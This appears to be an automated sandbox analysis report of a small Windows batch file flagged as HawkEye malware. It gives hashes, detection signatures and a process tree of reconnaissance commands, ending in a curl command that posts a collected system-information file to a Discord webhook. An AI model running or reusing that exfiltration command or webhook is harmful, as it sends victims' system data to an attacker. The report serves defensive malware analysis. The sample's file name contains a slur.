Analysis

  • max time kernel
    103s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/04/2025, 14:46

General

  • Target

    5QWRY_niggagimeinfo2.bat

  • Size

    699B

  • MD5

    2f1b10244d657f82424382d603ef2091

  • SHA1

    b7a08e5f497fbf65521ebc2a10e602c5c09ae045

  • SHA256

    5bd7534e452a826f244c3f0531296895aa3d12c334bc0f9be484634af3df4f4b

  • SHA512

    1a19a13f8a31d4e15feb9c436f16bf4ac3494779376995ea4377b7795a16db3832a1656473e43ed8b1c5a3f6814bc6f1d00aaf2978e7677ce7ed2f537adbb7a9

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5QWRY_niggagimeinfo2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3316
    • C:\Windows\system32\HOSTNAME.EXE
      hostname
      2⤵
        PID:5032
      • C:\Windows\system32\whoami.exe
        whoami
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2344
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:2716
      • C:\Windows\system32\findstr.exe
        findstr /B /C:"OS Name" /C:"OS Version"
        2⤵
          PID:3584
        • C:\Windows\system32\ipconfig.exe
          ipconfig
          2⤵
          • Gathers network information
          PID:4716
        • C:\Windows\system32\findstr.exe
          findstr IPv6
          2⤵
            PID:1628
          • C:\Windows\system32\ipconfig.exe
            ipconfig
            2⤵
            • Gathers network information
            PID:2108
          • C:\Windows\system32\findstr.exe
            findstr IPv4
            2⤵
              PID:3588
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic logicaldisk get caption, freespace, size
              2⤵
              • Collects information from the system
              • Suspicious use of AdjustPrivilegeToken
              PID:3008
            • C:\Windows\system32\curl.exe
              curl -X POST https://discord.com/api/webhooks/1356639514516521070/8nlc2VGdJHuRDez5RrzlRRII70A1yJIPtcnWxxs29eiCCPnO9RISRmMRDDKhvSaTzDx8 -H -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"
              2⤵
                PID:4424

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads